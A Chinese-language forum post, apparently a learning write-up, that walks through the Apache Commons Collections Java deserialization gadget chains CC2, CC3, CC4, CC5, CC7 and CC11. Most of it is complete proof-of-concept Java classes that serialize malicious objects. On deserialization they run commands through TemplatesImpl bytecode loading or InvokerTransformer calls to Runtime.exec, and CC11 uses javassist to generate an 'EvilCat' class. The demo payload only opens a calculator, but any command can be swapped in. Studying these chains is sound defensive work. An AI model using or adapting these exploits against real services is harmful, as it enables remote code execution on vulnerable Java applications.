  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  5. import org.apache.commons.collections.Transformer;
  6. import org.apache.commons.collections.functors.ChainedTransformer;
  7. import org.apache.commons.collections.functors.ConstantTransformer;
  8. import org.apache.commons.collections.functors.InvokerTransformer;
  9. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  10. import org.apache.commons.collections.map.LazyMap;
  12. import java.io.*;
  13. import java.lang.annotation.Target;
  14. import java.lang.reflect.*;
  15. import java.nio.file.Files;
  16. import java.nio.file.Paths;
  17. import java.util.HashMap;
  18. import java.util.Map;
  20. public class CC3 {
  21.     public static void serialize(Object obj) throws IOException {
  22.         FileOutputStream fos = new FileOutputStream("cc3.bin");
  23.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  24.         oos.writeObject(obj);
  25.     }
  26.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  27.         FileInputStream fis = new FileInputStream(filename);
  28.         ObjectInputStream ois = new ObjectInputStream(fis);
  29.         ois.readObject();
  30.     }
  32.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  33.         TemplatesImpl templates = new TemplatesImpl();
  34.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  35.         _name.setAccessible(true);
  36.         _name.set(templates, "1");
  37.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  38.         _bytecodes.setAccessible(true);
  39.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  40.         byte[][] code = {bytes};
  41.         _bytecodes.set(templates, code);
  42.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  43.         _tfactory.setAccessible(true);
  44.         _tfactory.set(templates, new TransformerFactoryImpl());
  45.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  46.         ABSTRACT_TRANSLET.setAccessible(true);
  47.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  48. //        Transformer transformer = templates.newTransformer();
  49.         Transformer[] transformers = new Transformer[]{
  50.                 new ConstantTransformer(templates),
  51.                 new InvokerTransformer("newTransformer", null, null)
  52.         };
  53.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  54.         Map<Object, Object> map = new HashMap<>();
  55.         Map<Object, Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  56.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  57.         HashMap<Object, Object> hashMap = new HashMap<>();
  58.         hashMap.put(tiedMapEntry, null);
  59.         map.remove(null);
  60.         Field factory = LazyMap.class.getDeclaredField("factory");
  61.         factory.setAccessible(true);
  62.         factory.set(lazymap, chainedTransformer);
  63.         serialize(hashMap);
  64.         deserialize("cc3.bin");
  65.     }
  66. }
复制代码
美满收官,分析一下yso的CC3,又有所差别,可以看到它在Transformer[]里调用的是InstantiateTransformer,还引入了TrAXFilter这个类,我们追踪一下

首先TrAXFilter中会调用newTransformer

再看InstantiateTransformer的transform方法,获取构造器,再实例化,刚好可以触发TrAXFilter
  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
  5. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  6. import org.apache.commons.collections.Transformer;
  7. import org.apache.commons.collections.functors.ChainedTransformer;
  8. import org.apache.commons.collections.functors.ConstantTransformer;
  9. import org.apache.commons.collections.functors.InstantiateTransformer;
  10. import org.apache.commons.collections.functors.InvokerTransformer;
  11. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  12. import org.apache.commons.collections.map.LazyMap;
  14. import javax.xml.transform.Templates;
  15. import java.io.*;
  16. import java.lang.annotation.Target;
  17. import java.lang.reflect.*;
  18. import java.nio.file.Files;
  19. import java.nio.file.Paths;
  20. import java.util.HashMap;
  21. import java.util.Map;
  23. public class CC3 {
  24.     public static void serialize(Object obj) throws IOException {
  25.         FileOutputStream fos = new FileOutputStream("cc3.bin");
  26.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  27.         oos.writeObject(obj);
  28.     }
  29.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  30.         FileInputStream fis = new FileInputStream(filename);
  31.         ObjectInputStream ois = new ObjectInputStream(fis);
  32.         ois.readObject();
  33.     }
  35.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  36.         TemplatesImpl templates = new TemplatesImpl();
  37.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  38.         _name.setAccessible(true);
  39.         _name.set(templates, "1");
  40.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  41.         _bytecodes.setAccessible(true);
  42.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  43.         byte[][] code = {bytes};
  44.         _bytecodes.set(templates, code);
  45.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  46.         _tfactory.setAccessible(true);
  47.         _tfactory.set(templates, new TransformerFactoryImpl());
  48.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  49.         ABSTRACT_TRANSLET.setAccessible(true);
  50.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  51. //        Transformer transformer = templates.newTransformer();
  52.         Transformer[] transformers = new Transformer[]{
  53.                 new ConstantTransformer(TrAXFilter.class),
  54.                 new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
  55.         };
  56.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  57.         HashMap<Object, Object> map = new HashMap<>();
  58.         Map<Object, Object> decorate = LazyMap.decorate(map,  chainedTransformer);
  59.         Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  60.         Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
  61.         constructor.setAccessible(true);
  62.         InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, decorate);
  63.         Map newMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);
  64.         Object o = constructor.newInstance(Target.class, newMap);
  65.         serialize(o);
  66.         deserialize("cc3.bin");
  67.     }
  68. }
复制代码
OK,美满办理
心不在焉CC4

CC4需要commoncollection4的依赖
  1. <dependency>
  2.     <groupId>org.apache.commons</groupId>
  3.     <artifactId>commons-collections4</artifactId>
  4.     <version>4.0</version>
  5. </dependency>
复制代码
CC4实在就是CC3的前半部门,在修改了一下后部门的一些操作,不是像CC1,CC6那样使用LazyMap来触发transform了,所以得换别的类,such as TransformingComparator,这是commoncollection4里的类,我们跟进一下,compare这里调用了transform

继承跟进,看哪调用了compare,PriorityQueue类

跟进

继承跟进

美满

构造exp:
  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
  5. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  6. import org.apache.commons.collections4.Transformer;
  7. import org.apache.commons.collections4.functors.ChainedTransformer;
  8. import org.apache.commons.collections4.functors.ConstantTransformer;
  9. import org.apache.commons.collections4.functors.InstantiateTransformer;
  10. import org.apache.commons.collections4.comparators.TransformingComparator;
  12. import javax.xml.transform.Templates;
  13. import java.io.*;
  14. import java.lang.reflect.Field;
  15. import java.nio.file.Files;
  16. import java.nio.file.Paths;
  17. import java.util.PriorityQueue;
  19. public class CC4 {
  20.     public static void serialize(Object obj) throws IOException {
  21.         FileOutputStream fos = new FileOutputStream("cc4.bin");
  22.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  23.         oos.writeObject(obj);
  24.     }
  25.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  26.         FileInputStream fis = new FileInputStream(filename);
  27.         ObjectInputStream ois = new ObjectInputStream(fis);
  28.         ois.readObject();
  29.     }
  31.     public static void main(String[] args) throws NoSuchFieldException, IOException, IllegalAccessException, ClassNotFoundException {
  32.         TemplatesImpl templates = new TemplatesImpl();
  33.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  34.         _name.setAccessible(true);
  35.         _name.set(templates, "1");
  36.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  37.         _bytecodes.setAccessible(true);
  38.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  39.         byte[][] code = {bytes};
  40.         _bytecodes.set(templates, code);
  41.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  42.         _tfactory.setAccessible(true);
  43.         _tfactory.set(templates, new TransformerFactoryImpl());
  44.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  45.         ABSTRACT_TRANSLET.setAccessible(true);
  46.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  47.         Transformer[] transformers = new Transformer[]{
  48.                 new ConstantTransformer(TrAXFilter.class),
  49.                 new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
  50.         };
  51.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  52.         TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
  53.         Field transformer = TransformingComparator.class.getDeclaredField("transformer");
  54.         transformer.setAccessible(true);
  55.         transformer.set(transformingComparator, chainedTransformer);
  56.         PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);
  57.         priorityQueue.add(1);
  58.         priorityQueue.add(2);
  59.         serialize(priorityQueue);
  60.         deserialize("cc4.bin");
  61.     }
  62. }
复制代码
成功弹出计算器
身不由己CC2

CC2与CC4差别的地方就是后半些许差别,没有用chainedtrainsform,直接用invokertransformer
直接上poc了,没啥可调试的
  1. package com.f12;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  5. import org.apache.commons.collections4.comparators.TransformingComparator;
  6. import org.apache.commons.collections4.functors.ConstantTransformer;
  7. import org.apache.commons.collections4.functors.InvokerTransformer;
  9. import java.io.*;
  10. import java.lang.reflect.Field;
  11. import java.nio.file.Files;
  12. import java.nio.file.Paths;
  13. import java.util.PriorityQueue;
  15. public class CC2 {
  16.     public static void serialize(Object obj) throws IOException {
  17.         FileOutputStream fos = new FileOutputStream("cc2.bin");
  18.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  19.         oos.writeObject(obj);
  20.     }
  21.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  22.         FileInputStream fis = new FileInputStream(filename);
  23.         ObjectInputStream ois = new ObjectInputStream(fis);
  24.         ois.readObject();
  25.     }
  27.     public static void main(String[] args) throws NoSuchFieldException, IOException, IllegalAccessException, ClassNotFoundException {
  28.         TemplatesImpl templates = new TemplatesImpl();
  29.         Field _name = TemplatesImpl.class.getDeclaredField("_name");
  30.         _name.setAccessible(true);
  31.         _name.set(templates, "1");
  32.         Field _bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
  33.         _bytecodes.setAccessible(true);
  34.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\CC1\\target\\classes\\com\\f12\\Eval.class"));
  35.         byte[][] code = {bytes};
  36.         _bytecodes.set(templates, code);
  37.         Field _tfactory = TemplatesImpl.class.getDeclaredField("_tfactory");
  38.         _tfactory.setAccessible(true);
  39.         _tfactory.set(templates, new TransformerFactoryImpl());
  40.         Field ABSTRACT_TRANSLET = TemplatesImpl.class.getDeclaredField("ABSTRACT_TRANSLET");
  41.         ABSTRACT_TRANSLET.setAccessible(true);
  42.         ABSTRACT_TRANSLET.set(templates, "java.lang.Object");
  43.         InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer",new Class[]{},new Object[]{});
  44.         TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
  45.         PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);
  46.         priorityQueue.add(templates);
  47.         priorityQueue.add(2);
  48.         Field transformer = TransformingComparator.class.getDeclaredField("transformer");
  49.         transformer.setAccessible(true);
  50.         transformer.set(transformingComparator, invokerTransformer);
  51.         serialize(priorityQueue);
  52.         deserialize("cc2.bin");
  53.     }
  54. }
复制代码
有点眼熟CC5

CC5就是改了一点点的CC6,看链子,就改了readObject部门,分析一下

触发LazyMap.get换成了toString,这里调用了getValue

继承跟进,BadAttributeValueExpException的readObject调用了toString

这样就可以构造链子了,非常简单
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  8. import org.apache.commons.collections.map.LazyMap;
  10. import javax.management.BadAttributeValueExpException;
  11. import java.io.*;
  12. import java.lang.reflect.Field;
  13. import java.util.HashMap;
  14. import java.util.Map;
  16. public class CC5 {
  17.     public static void serialize(Object obj) throws IOException {
  18.         FileOutputStream fos = new FileOutputStream("cc5.bin");
  19.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  20.         oos.writeObject(obj);
  21.     }
  22.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  23.         FileInputStream fis = new FileInputStream(filename);
  24.         ObjectInputStream ois = new ObjectInputStream(fis);
  25.         ois.readObject();
  26.     }
  28.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
  29.         Transformer[] transformers = new Transformer[]{
  30.                 new ConstantTransformer(Runtime.class),
  31.                 new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  32.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  33.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  34.         };
  35.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  36.         Map<Object, Object> map = new HashMap<>();
  37.         Map<Object, Object> lazymap = LazyMap.decorate(map, chainedTransformer);
  38.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
  39.         BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
  40.         Field val = BadAttributeValueExpException.class.getDeclaredField("val");
  41.         val.setAccessible(true);
  42.         val.set(badAttributeValueExpException, tiedMapEntry);
  43.         serialize(badAttributeValueExpException);
  44.         deserialize("cc5.bin");
  45.     }
  46. }
复制代码
越看越熟CC7

CC7的链子,这里是从LazyMap.get的调用开始修改了

追踪一下,AbstractMap类的equals调用了get

继承追踪equals,AbstractMapDecorator的equals调用了

继承追踪,为什么要用reconstitutionPut?Hashtable里还有好多地方都调用了equals

由于它在readObject中被调用了
  1. private void readObject(java.io.ObjectInputStream s)
  2.          throws IOException, ClassNotFoundException
  3.     {
  4.         // Read in the length, threshold, and loadfactor
  5.         s.defaultReadObject();
  7.         // Read the original length of the array and number of elements
  8.         int origlength = s.readInt();
  9.         int elements = s.readInt();
  11.         // Compute new size with a bit of room 5% to grow but
  12.         // no larger than the original size.  Make the length
  13.         // odd if it's large enough, this helps distribute the entries.
  14.         // Guard against the length ending up zero, that's not valid.
  15.         int length = (int)(elements * loadFactor) + (elements / 20) + 3;
  16.         if (length > elements && (length & 1) == 0)
  17.             length--;
  18.         if (origlength > 0 && length > origlength)
  19.             length = origlength;
  20.         table = new Entry<?,?>[length];
  21.         threshold = (int)Math.min(length * loadFactor, MAX_ARRAY_SIZE + 1);
  22.         count = 0;
  24.         // Read the number of elements and then all the key/value objects
  25.         for (; elements > 0; elements--) {
  26.             @SuppressWarnings("unchecked")
  27.                 K key = (K)s.readObject();
  28.             @SuppressWarnings("unchecked")
  29.                 V value = (V)s.readObject();
  30.             // synch could be eliminated for performance
  31.             reconstitutionPut(table, key, value);
  32.         }
  33.     }
复制代码
这样链子就明了了,构造poc,注意AbstractMapDecorator和AbstractMap都是抽象类,并不能实例化,但是都实现了Map,所以调用equals时是调用lazyMap.equals,找不到往上找就能找到AbstractMap.equals
  1. package com.f12;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.ChainedTransformer;
  5. import org.apache.commons.collections.functors.ConstantTransformer;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.map.AbstractMapDecorator;
  8. import org.apache.commons.collections.map.LazyMap;
  10. import java.io.*;
  11. import java.lang.reflect.Field;
  12. import java.util.AbstractMap;
  13. import java.util.HashMap;
  14. import java.util.Hashtable;
  15. import java.util.Map;
  17. public class CC7 {
  18.     public static void serialize(Object obj) throws IOException {
  19.         FileOutputStream fos = new FileOutputStream("cc7.bin");
  20.         ObjectOutputStream oos = new ObjectOutputStream(fos);
  21.         oos.writeObject(obj);
  22.     }
  23.     public static void deserialize(String filename) throws IOException, ClassNotFoundException {
  24.         FileInputStream fis = new FileInputStream(filename);
  25.         ObjectInputStream ois = new ObjectInputStream(fis);
  26.         ois.readObject();
  27.     }
  29.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
  30.         Transformer[] transformers = new Transformer[]{
  31.                 new ConstantTransformer(Runtime.class),
  32.                 new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
  33.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
  34.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  35.         };
  36.         ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{});
  37.         Map<Object, Object> map1 = new HashMap<>();
  38.         Map<Object, Object> map2 = new HashMap<>();
  39.         Map<Object, Object> lazymap1 = LazyMap.decorate(map1, chainedTransformer);
  40.         Map<Object, Object> lazymap2 = LazyMap.decorate(map2, chainedTransformer);
  41.         lazymap1.put("yy", 1);
  42.         lazymap2.put("zZ",1);
  43.         Hashtable hashtable = new Hashtable<>();
  44.         hashtable.put(lazymap1, 1);
  45.         hashtable.put(lazymap2,2);
  46.         Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
  47.         iTransformers.setAccessible(true);
  48.         iTransformers.set(chainedTransformer, transformers);
  49.         lazymap2.remove("yy");
  50.         serialize(hashtable);
  51.         deserialize("cc7.bin");
  52.     }
  53. }
复制代码
这里很有意思,键值还非得是yy和zZ,原因是它们两个的hashCode值相等,这样在reconstitutionPut方法中才能触发equals方法
不知好歹CC11

这里还学到一个javassist动态创建类,依赖:
  1. <dependency>
  2.   <groupId>org.javassist</groupId>
  3.   <artifactId>javassist</artifactId>
  4.   <version>3.29.1-GA</version>
  5. </dependency>
复制代码
从构造形式来看像是CC2和CC6的杂交,但是里面有挺多的细节,先给出poc:
  1. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import javassist.ClassClassPath;
  4. import javassist.ClassPool;
  5. import javassist.CtClass;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  8. import org.apache.commons.collections.map.LazyMap;
  10. import java.io.FileInputStream;
  11. import java.io.FileOutputStream;
  12. import java.io.ObjectInputStream;
  13. import java.io.ObjectOutputStream;
  14. import java.lang.reflect.Constructor;
  15. import java.lang.reflect.Field;
  16. import java.util.HashMap;
  17. import java.util.HashSet;
  19. @SuppressWarnings("all")
  20. public class cc11 {
  21.     public static void main(String[] args) throws Exception {
  23.         // 利用javasist动态创建恶意字节码
  24.         ClassPool pool = ClassPool.getDefault();
  25.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
  26.         CtClass cc = pool.makeClass("Cat");
  27.         String cmd = "java.lang.Runtime.getRuntime().exec("open  /System/Applications/Calculator.app");";
  28.         cc.makeClassInitializer().insertBefore(cmd);
  29.         String randomClassName = "EvilCat" + System.nanoTime();
  30.         cc.setName(randomClassName);
  31.         cc.setSuperclass(pool.get(AbstractTranslet.class.getName())); //设置父类为AbstractTranslet,避免报错
  33.         // 写入.class 文件
  34.         // 将我的恶意类转成字节码,并且反射设置 bytecodes
  35.         byte[] classBytes = cc.toBytecode();
  36.         byte[][] targetByteCodes = new byte[][]{classBytes};
  37.         TemplatesImpl templates = TemplatesImpl.class.newInstance();
  39.         Field f0 = templates.getClass().getDeclaredField("_bytecodes");
  40.         f0.setAccessible(true);
  41.         f0.set(templates,targetByteCodes);
  43.         f0 = templates.getClass().getDeclaredField("_name");
  44.         f0.setAccessible(true);
  45.         f0.set(templates,"name");
  47.         f0 = templates.getClass().getDeclaredField("_class");
  48.         f0.setAccessible(true);
  49.         f0.set(templates,null);
  51.         InvokerTransformer transformer = new InvokerTransformer("asdfasdfasdf", new Class[0], new Object[0]);
  52.         HashMap innermap = new HashMap();
  53.         LazyMap map = (LazyMap)LazyMap.decorate(innermap,transformer);
  54.         TiedMapEntry tiedmap = new TiedMapEntry(map,templates);
  55.         HashSet hashset = new HashSet(1);
  56.         hashset.add("foo");
  57.         Field f = null;
  58.         try {
  59.             f = HashSet.class.getDeclaredField("map");
  60.         } catch (NoSuchFieldException e) {
  61.             f = HashSet.class.getDeclaredField("backingMap");
  62.         }
  63.         f.setAccessible(true);
  64.         HashMap hashset_map = (HashMap) f.get(hashset);
  66.         Field f2 = null;
  67.         try {
  68.             f2 = HashMap.class.getDeclaredField("table");
  69.         } catch (NoSuchFieldException e) {
  70.             f2 = HashMap.class.getDeclaredField("elementData");
  71.         }
  73.         f2.setAccessible(true);
  74.         Object[] array = (Object[])f2.get(hashset_map);
  76.         Object node = array[0];
  77.         if(node == null){
  78.             node = array[1];
  79.         }
  80.         Field keyField = null;
  81.         try{
  82.             keyField = node.getClass().getDeclaredField("key");
  83.         }catch(Exception e){
  84.             keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
  85.         }
  86.         keyField.setAccessible(true);
  87.         keyField.set(node,tiedmap);
  89.         Field f3 = transformer.getClass().getDeclaredField("iMethodName");
  90.         f3.setAccessible(true);
  91.         f3.set(transformer,"newTransformer");
  93.         try{
  94.             ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc11"));
  95.             outputStream.writeObject(hashset);
  96.             outputStream.close();
  98.             ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc11"));
  99.             inputStream.readObject();
  100.         }catch(Exception e){
  101.             e.printStackTrace();
  102.         }
  103.     }
  105. }
复制代码
先解释一下动态生成类
  1. ClassPool pool = ClassPool.getDefault();: 创建一个ClassPool对象,它是Javassist库中用于管理CtClass对象(表示编译时类)的池。
  3. pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));: 将AbstractTranslet类的类路径(ClassClassPath)插入到ClassPool中。这样做是为了确保在创建新类时,能够引用到AbstractTranslet类。
  5. CtClass cc = pool.makeClass("Cat");: 使用ClassPool创建一个名为"Cat"的新CtClass对象,表示一个新的类。
  7. String cmd = "java.lang.Runtime.getRuntime().exec("open  /System/Applications/Calculator.app");";: 定义了一个字符串变量cmd,其中包含要执行的恶意命令。该命令使用Runtime.getRuntime().exec()方法执行一个指定的命令,这里是打开计算器应用程序(Calculator.app)。
  9. cc.makeClassInitializer().insertBefore(cmd);: 使用cc.makeClassInitializer()创建类初始化器(class initializer),并在其之前插入恶意命令。
  11. String randomClassName = "EvilCat" + System.nanoTime();: 创建一个随机的类名,以确保每次执行代码时都会创建一个唯一的类名。
  13. cc.setName(randomClassName);: 将新创建的类的名称设置为随机生成的类名。
  15. cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));: 设置新创建的类的父类为AbstractTranslet类。
复制代码
分析过程:http://wjlshare.com/archives/1536
结尾

CC链到此为止,有些地方可能我自己也没弄太明确,建议结合别的文章品鉴

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

麻花痒

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表